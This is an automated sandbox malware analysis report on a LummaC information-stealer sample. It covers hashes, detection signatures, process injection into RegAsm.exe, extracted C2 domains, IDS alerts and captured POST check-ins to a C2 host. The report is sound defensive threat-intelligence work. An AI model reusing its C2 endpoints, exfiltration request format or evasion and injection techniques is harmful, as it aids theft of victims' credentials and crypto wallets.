Edit tour

Windows Analysis Report
FoS5cjKhd3.exe

Overview

General Information

Sample name:	FoS5cjKhd3.exe renamed because original name is a hash value
Original sample name:	3b2250172cdc65f249533ad138ef8ab5.exe
Analysis ID:	1520608
MD5:	3b2250172cdc65f249533ad138ef8ab5
SHA1:	70d66ee841754f39e7abffeb8f980be3f1e50033
SHA256:	1622822b3f7f66537240b4760560550654eb2c23c1f57c7e4bb52d3cbc5edd5e
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

FoS5cjKhd3.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\FoS5cjKhd3.exe" MD5: 3B2250172CDC65F249533AD138EF8AB5)

conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1768 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1772 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["drawzhotdog.shop", "lootebarrkeyn.shop", "ghostreedmnu.shop", "offensivedzvju.shop", "reinforcenh.shop", "stogeneratmns.shop", "gutterydhowi.shop", "vozmeatillu.shop", "fragnantbui.shop"], "Build id": "FATE99--"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T16:47:13.162369+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49711	104.21.4.136	443	TCP
2024-09-27T16:47:14.311281+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49712	104.21.4.136	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T16:47:13.162369+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49711	104.21.4.136	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T16:47:14.311281+0200	2049812	1	A Network Trojan was detected	192.168.2.6	49712	104.21.4.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T16:47:12.707321+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.6	49711	104.21.4.136	443	TCP
2024-09-27T16:47:13.840862+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.6	49712	104.21.4.136	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T16:47:12.136915+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.6	51246	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T16:47:12.119062+0200	2056048	1	Domain Observed Used for C2 Detected	192.168.2.6	64503	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 3.2.RegAsm.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["drawzhotdog.shop", "lootebarrkeyn.shop", "ghostreedmnu.shop", "offensivedzvju.shop", "reinforcenh.shop", "stogeneratmns.shop", "gutterydhowi.shop", "vozmeatillu.shop", "fragnantbui.shop"], "Build id": "FATE99--"}

Multi AV Scanner detection for submitted file

Source: FoS5cjKhd3.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lootebarrkeyn.shop
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: FATE99--

Source: FoS5cjKhd3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49712 version: TLS 1.2

Source: FoS5cjKhd3.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: c:\rje\tg\ev8pv\obj\Release\ojc.pdb source: FoS5cjKhd3.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor eax, eax	3_2_0040F042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	3_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	3_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_0040D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	3_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	3_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	3_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	3_2_00447E1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, esi	3_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	3_2_0044B010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00425030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]	3_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	3_2_0044B1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00427230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	3_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	3_2_004142E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	3_2_0044B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	3_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	3_2_00442410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_0044B430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_004314A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_00435519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_00433623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	3_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_00434629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	3_2_0040F63A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	3_2_00414692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000668h]	3_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	3_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	3_2_0040F7E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	3_2_0040F807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000001C8h]	3_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000198h]	3_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	3_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	3_2_00444970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000884h]	3_2_00429978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	3_2_00420A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	3_2_00440A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	3_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	3_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	3_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	3_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00421AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	3_2_00444BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	3_2_0041AB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	3_2_00448B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_00430CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	3_2_00405CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	3_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	3_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	3_2_00445DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	3_2_00448D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	3_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	3_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebx, 02h	3_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	3_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then dec ebx	3_2_0043FE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	3_2_00426FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [004521ECh]	3_2_0041FFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h	3_2_0042DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_0043BFF0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056048 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop) : 192.168.2.6:64503 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.6:49712 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.6:49711 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.6:51246 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49712 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49711 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 104.21.4.136:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: lootebarrkeyn.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop

Source: Joe Sandbox View

IP Address: 104.21.4.136 104.21.4.136

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=0ALx9as21P0wgnMaAwgr5eEZBUx4ljqDx7xZ1jR49JI-1727448433-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: gutterydhowi.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: lootebarrkeyn.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop

Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gutterydhowi.shop/
Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2264764815.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gutterydhowi.shop/api
Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gutterydhowi.shop/apiC
Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gutterydhowi.shop/apiM
Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/acce

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49712 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_00439BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0043A777 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_0043A777

System Summary

.NET source code contains very large array initializations

Source: FoS5cjKhd3.exe, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 365056

Source: C:\Users\user\Desktop\FoS5cjKhd3.exe	Code function: 1_2_02B60C40	1_2_02B60C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004404AB	3_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00447D38	3_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401000	3_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004480B0	3_2_004480B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00449120	3_2_00449120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040C1C0	3_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D250	3_2_0042D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A231	3_2_0040A231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0044A230	3_2_0044A230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004012C7	3_2_004012C7
